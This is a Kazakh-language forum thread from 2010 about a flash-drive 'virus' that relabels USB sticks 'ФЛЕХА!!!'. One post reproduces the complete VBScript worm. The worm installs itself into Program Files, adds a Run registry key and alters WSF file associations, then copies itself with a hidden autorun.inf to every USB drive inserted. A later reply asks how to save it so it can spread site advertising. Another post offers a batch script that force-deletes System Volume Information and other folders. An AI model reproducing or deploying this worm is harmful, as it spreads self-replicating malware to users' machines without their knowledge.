SoftZONE.kz форумы » Вирус, "ФЛЕХА!!!" деген вирус

Сайттың негізгі беті • Тіркелу • Іздеу • Жаңа пікірлер • Кері байланыс

Жаңа пікірлер | Жазылымдар

Вирус, "ФЛЕХА!!!" деген вирус
Форум опциялары

SaboniS	Пікір #1
Қолданушы 34 Репутация: 2 Тобы: Қолданушы Пікірлері: 72 Регистрация: 7.10.2009 Jabber: SaboniS@softzone.kz ICQ:--	"ФЛЕХА!!!" деген вирус. Сонгы скездери осы вирусты коп кезиктирип журмин. Кыскасы флешканын аты осылай озгерип кетеди. Ал антивируска салып тексермекши болсан ешкандай вирус таппайды. Болмаган сон флешканы форматтауга тура келеди. Кимде ким бул вирусты жоюдын баска жолын тапса осы жерге жазыныздаршы. --------------------------------------
14 шілде 2010 17:02	ICQ: -- \| Тіркелген күні: 7.10.2009 \|

X-myRzA	Пікір #2
Ақсақал 85 Репутация: 9 Тобы: ADMiN Пікірлері: 285 Регистрация: 14.02.2009 Jabber: x-myrza@softzone.kz ICQ:369630658	Бұл вирус емес сияқты. Мен кодын қарағанмын. Бұл ноабарот вирустардың autorun.inf файылдарынан флешканы қорғайтын сияқты. Бірақ, толық қарағаным жоқ. Менімше солай сияқты. -------------------------------------- if (көмектесті ма) { репутация++;}
14 шілде 2010 18:55	ICQ: 369630658 \| Тіркелген күні: 14.02.2009 \|

SaboniS	Пікір #3
Қолданушы 34 Репутация: 2 Тобы: Қолданушы Пікірлері: 72 Регистрация: 7.10.2009 Jabber: SaboniS@softzone.kz ICQ:--	X-myRzA, Сонда будан коркудын кажети шамалы дегиниз келема? --------------------------------------
14 шілде 2010 21:26	ICQ: -- \| Тіркелген күні: 7.10.2009 \|

NR	Пікір #4
Тұрақты қолданушы 51 Репутация: 1 Тобы: Қолданушы Пікірлері: 111 Регистрация: 22.03.2010 Jabber: @softzone.kz ICQ:908914	мен де кездестіргем осындай атпен аталған флешкаларды, бірақ өздері өзгертіп қойған десем) -------------------------------------- Мен - Қазақпын, мың өліп, мың тірілген...
14 шілде 2010 22:03	ICQ: 908914 \| Тіркелген күні: 22.03.2010 \|

X-myRzA	Пікір #5
Ақсақал 85 Репутация: 9 Тобы: ADMiN Пікірлері: 285 Регистрация: 14.02.2009 Jabber: x-myrza@softzone.kz ICQ:369630658	ішіндегі коды <?xml version="1.0" encoding="windows-1251"?> <!-- Проект: usb_anti_autorun --> <!-- Автор: AxeL --> <!-- При участии: Аскет --> <!-- Файл: vir.wsf --> <!-- Версия: 1.1 --> [color=#FF0000]<!-- Назначение: подмена файла autorun.inf на свой (или его убийство, для этого в скрипте удалить строки со 155 по 175 включительно) --> <!-- дабы не запустился вирь, в момент подсоединения флэхи --> <!-- метод распространения: виросоподобный(autorun) --> <!-- Права: Можно изменять скрипт под свои нужды, смотреть под отладчиком (в общем, любые) -->[/color] <!-- Гарантии: Никаких (ни явных, ни подразумеваемых) --> <!-- Причина написания скрипта: Penetrator --> <!-- Связь с автором: через сайт askett.hoter.ru --> <package> <job id="Self_Install"> <runtime> <description> Имя: vir.wsf Автор: AxeL Описание: Самоустановка в %ProgramFiles%\usb_anti_autorun </description> </runtime> <script language="VBScript"> <![CDATA[ Option Explicit Dim fso, sh Dim oWmi, oSelQ, oItem Dim Root, InstDir, InstFolder : InstFolder = "\usb_anti_autorun" Dim File, attr Dim RegKey On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set sh = CreateObject("WScript.Shell") InstDir = sh.ExpandEnvironmentStrings("%programfiles%") & InstFolder Root = sh.ExpandEnvironmentStrings("%SystemRoot%") If (Chr(34) & fso.GetParentFolderName(WScript.ScriptFullName) & Chr(34)) <> (Chr(34) & InstDir & Chr(34)) Then If Not fso.FolderExists(InstDir) Then fso.CreateFolder InstDir If fso.FileExists(InstDir & "\vir.wsf") Then Set File = fso.GetFile(InstDir & "\vir.wsf") attr = File.Attributes File.Attributes = 0 fso.CopyFile WScript.ScriptFullName, InstDir & "\vir.wsf" File.Attributes = attr Else fso.CopyFile WScript.ScriptFullName, InstDir & "\vir.wsf" Set File = fso.GetFile(InstDir & "\vir.wsf") File.Attributes = 33 End If sh.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\usb_au torun_remover", _ Chr(34) & Root & "\System32\wscript.exe" & Chr(34) & " " & Chr(34) & InstDir & "\vir.wsf" & Chr(34) & " //Job:Work" RegKey = sh.RegRead("HKCR\WSFFile\EditFlags") If Err.Number = 0 Then sh.RegDelete "HKCR\WSFFile\EditFlags" RegKey = sh.RegRead("HKCR\WSFFile\Shell\Open\Command\") If RegKey <> "%SystemRoot%\System32\WScript.exe ""%1"" %" Then _ sh.RegWrite "HKCR\WSFFile\Shell\Open\Command\", "%SystemRoot%\System32\WScript.exe ""%1"" %" sh.RegWrite "HKCR\WSFFile\EditFlags", 24, "REG_DWORD" Set oWmi = GetObject("WinMgmts:{impersonationLevel=impersonate}!//./root/cimv2& #34;) Set oSelQ = oWmi.ExecQuery("SELECT * FROM Win32_Process") For Each oItem In oSelQ If LCase(RTrim(oItem.CommandLine)) = LCase(Chr(34) & Root & "\System32\wscript.exe" & Chr(34) & " " & Chr(34) & InstDir & "\vir.wsf" & Chr(34) & " //Job:Work") _ Then oItem.Terminate Next sh.Exec(Chr(34) & Root & "\System32\wscript.exe" & Chr(34) & " " & Chr(34) & InstDir & "\vir.wsf" & Chr(34) & " //Job:Work") If Len(fso.GetParentFolderName(WScript.ScriptFullName)) <=3 Then sh.Exec("explorer.exe " & fso.GetParentFolderName(WScript.ScriptFullName)) Set fso = Nothing Set sh = Nothing Set oWmi = Nothing Set oSelQ = Nothing Set File = Nothing WScript.Quit Else sh.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\usb_au torun_remover", _ Chr(34) & Root & "\System32\wscript.exe" & Chr(34) & " " & Chr(34) & InstDir & "\vir.wsf" & Chr(34) & " //Job:Work" End If Sub Error_Handler() MsgBox Err.Number & Chr(13) & Err.Source & Chr(13) & Err.Description Err.Clear End Sub ]]> </script> </job> <job id="Work"> <runtime> <description> Имя: vir.wsf Автор: AxeL Описание: Висит в процессах и каждые 3 секунды проверяет, не присоединил ли кто-нибудь флэху, если да, проверяем наличие файла autorun.inf и убиваем его, если нет, ждемс... </description> </runtime> <script language="VBScript"> <![CDATA[ Option Explicit Dim CompName : CompName = "." Dim fso, sh Dim oWmi, oSelQ Dim oDisk, oItem Dim Root, InstDir, InstFolder : InstFolder = "\usb_anti_autorun" Dim ts, File, attr Dim Find On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set sh = CreateObject("WScript.Shell") InstDir = sh.ExpandEnvironmentStrings("%programfiles%") & InstFolder Root = sh.ExpandEnvironmentStrings("%SystemRoot%") Set oWmi = GetObject("WinMgmts:{impersonationLevel=impersonate}!//" & CompName & "/root/cimv2") Set oSelQ = oWmi.ExecQuery("SELECT * FROM Win32_Process") Find = 0 For Each oItem In oSelQ If LCase(RTrim(oItem.CommandLine)) = LCase(Chr(34) & Root & "\System32\wscript.exe" & Chr(34) & " " & Chr(34) & InstDir & "\vir.wsf" & Chr(34) & " //Job:Work") _ Then Find = Find + 1 Next If Find > 1 Then WScript.Quit 0 Set oDisk = oWmi.ExecNotificationQuery("SELECT * FROM __InstanceCreationEvent " & _ "WITHIN 3 WHERE TargetInstance ISA 'Win32_LogicalDisk'") Do Set oItem = oDisk.NextEvent If fso.FileExists (oItem.TargetInstance.DeviceID & "\autorun.inf") Then Set File = fso.GetFile(oItem.TargetInstance.DeviceID & "\autorun.inf") File.Attributes = 0 File.Delete End If Set ts = fso.CreateTextFile(oItem.TargetInstance.DeviceID & "\autorun.inf") ts.WriteLine "[AutoRun]" ts.WriteLine "open=wscript vir.wsf" ts.WriteLine "shellexecute=wscript.exe vir.wsf" ts.WriteLine "action=Убийство флехи!" ts.WriteLine "description=[color=#3333FF][u]Флеха![/u] мына жерден атын өзгертуге болады))[/color]" ts.WriteLine "label=[color=#3333FF][u]Флеха![/u] мына жерден атын өзгертуге болады))[/color]" ts.WriteLine "shell=open" ts.WriteLine "UseAutoPlay=1" ts.WriteLine "shell\open\Command=wscript.exe vir.wsf" ts.WriteLine "shell\explore\Command=wscript.exe vir.wsf" ts.close Set File = fso.GetFile(oItem.TargetInstance.DeviceID & "\autorun.inf") File.Attributes = 39 If fso.FileExists(oItem.TargetInstance.DeviceID & "\vir.wsf") Then Set File = fso.GetFile(oItem.TargetInstance.DeviceID & "\vir.wsf") File.Attributes = 0 End If fso.CopyFile WScript.ScriptFullName, oItem.TargetInstance.DeviceID & "\vir.wsf" Set File = fso.GetFile(oItem.TargetInstance.DeviceID & "\vir.wsf") File.Attributes = 39 Loop While True ]]> </script> </job> </package> -------------------------------------- if (көмектесті ма) { репутация++;}
15 шілде 2010 09:44	ICQ: 369630658 \| Тіркелген күні: 14.02.2009 \|

Kuanchi	Пікір #6
Қолданушы 34 Репутация: 0 Тобы: Қолданушы Пікірлері: 53 Регистрация: 9.09.2009 Jabber: @softzone.kz ICQ:--	Үзінді: X-myRzA If fso.FileExists(oItem.TargetInstance.DeviceID & "\vir.wsf") Then Set File = fso.GetFile(oItem.TargetInstance.DeviceID & "\vir.wsf") File.Attributes = 0 End If fso.CopyFile WScript.ScriptFullName, oItem.TargetInstance.DeviceID & "\vir.wsf" Set File = fso.GetFile(oItem.TargetInstance.DeviceID & "\vir.wsf") File.Attributes = 39 Loop While True ]]> </script> </job> </package> Бұны қандай форматпен сақтау керек енді Жақсы вирус екен бір нарсені жарнамалауға)) мысалы сайтты))
16 шілде 2010 11:26	ICQ: -- \| Тіркелген күні: 9.09.2009 \|

X-myRzA	Пікір #7
Ақсақал 85 Репутация: 9 Тобы: ADMiN Пікірлері: 285 Регистрация: 14.02.2009 Jabber: x-myrza@softzone.kz ICQ:369630658	.wsf -------------------------------------- if (көмектесті ма) { репутация++;}
16 шілде 2010 12:22	ICQ: 369630658 \| Тіркелген күні: 14.02.2009 \|

X-myRzA	Пікір #8
Ақсақал 85 Репутация: 9 Тобы: ADMiN Пікірлері: 285 Регистрация: 14.02.2009 Jabber: x-myrza@softzone.kz ICQ:369630658	Соңғы кезде осы анти-авторанымыз неше түрлі модификациямын шығып жатыр. Сол себепті, көп сене бермеңіздер. Жойып тастауға кеңес беремін. Және мына скриптті флешкаларыңызда орындасаңыздар Сіздерде ешқашан autorun.inf файлы болмайды. Ол үшін флешкаңызға мәтіндік файл құрамыз, атын: anti-autorun.bat қылып ішіне мына кодты саламыз. КОДЫ: @echo Hi, a11!!! @echo Created by Team-X;) @echo -=X-myRzA=- @echo (c) 2009-2010 @echo off rd /s /q %~d0\recycled @echo off rd /s /q %~d0\recycler @echo off rd /s /q %~d0\RESTORE @echo off echo antivirus>%~d0\recycled @echo off echo antivirus>%~d0\recycler @echo off echo antivirus>%~d0\RESTORE @echo off echo Y \| cacls "%~d0\System Volume Information" /T /grant administrators:F @echo off echo Y \| cacls "%~d0\System Volume Information" /T /grant администраторлар:F @echo off rd /s /q "%~d0\System Volume Information" @echo off echo antivirus>"%~d0\System Volume Information" @echo off del /f /q %~d0\autorun.* @echo off mkdir "\\?\%~d0\autorun.inf\com1" @echo off attrib +s +h +a +r %~d0\autorun.inf @echo off del /f /q %~d0\desktop.ini @echo off mkdir "\\?\%~d0\desktop.ini\com1" @echo off attrib +s +h +a +r %~d0\desktop.ini @echo off del /f /q %~d0\vir.* @echo off mkdir "\\?\%~d0\vir.wsf\LPT4" @echo off attrib +s +h +a +r %~d0\vir.wsf @echo off attrib +s +h +a +r %~d0\recycled @echo off attrib +s +h +a +r %~d0\recycler @echo off attrib +s +h +a +r %~d0\RESTORE @echo off attrib +s +h +a +r "%~d0\System Volume Information" pause Сақтап, флешкадан орындааймыз. Осыдан кейін авторан жайында ойламай-ақ қоюғада болады деуге болады. -------------------------------------- if (көмектесті ма) { репутация++;}
22 тамыз 2010 17:47	ICQ: 369630658 \| Тіркелген күні: 14.02.2009 \|

Nurbagit	Пікір #9
Тұрақты қолданушы 51 Репутация: 1 Тобы: Қолданушы Пікірлері: 115 Регистрация: 21.12.2009 Jabber: @softzone.kz ICQ:--	Охо норма екен Вапше Вирус киргизбейтин жокпа))) // Объявим переменные и дескрипторы файла: int antivir[3]; ifstream virfile; // Откроем начало файла, где может быть вирус: virfile.open ("hello-virus.exe"); virfile.seekg (0, ios::beg); // Читаем нашу сигнатуру (слишком маленькая): antivir[0] = virfile.get(); antivir[1] = virfile.get(); antivir[2] = virfile.get(); // Принимаем решение: if(antivir[0] == 21 and antivir[1] == 14 and antivir[2] == 41) cout <<" VIRUS!!! "; // Закроем файл: virfile.close(); Мынау не типа сондай нарсе сиякты --------------------------------------
22 тамыз 2010 17:55	ICQ: -- \| Тіркелген күні: 21.12.2009 \|

« · Андеграунд · »

Жауап беру

Бұл тақырыпты 1 адам оқып отыр (қонақтар: 1)

Қолданушылар: 0

© 2009-2010 SoftZONE.kz Барлық құқы қорғалған.Сайттан алынған материалдарға міндетті түрде сілтеме қойылуы қажет!

Whois.1in.kz - Қазақстандық сайттар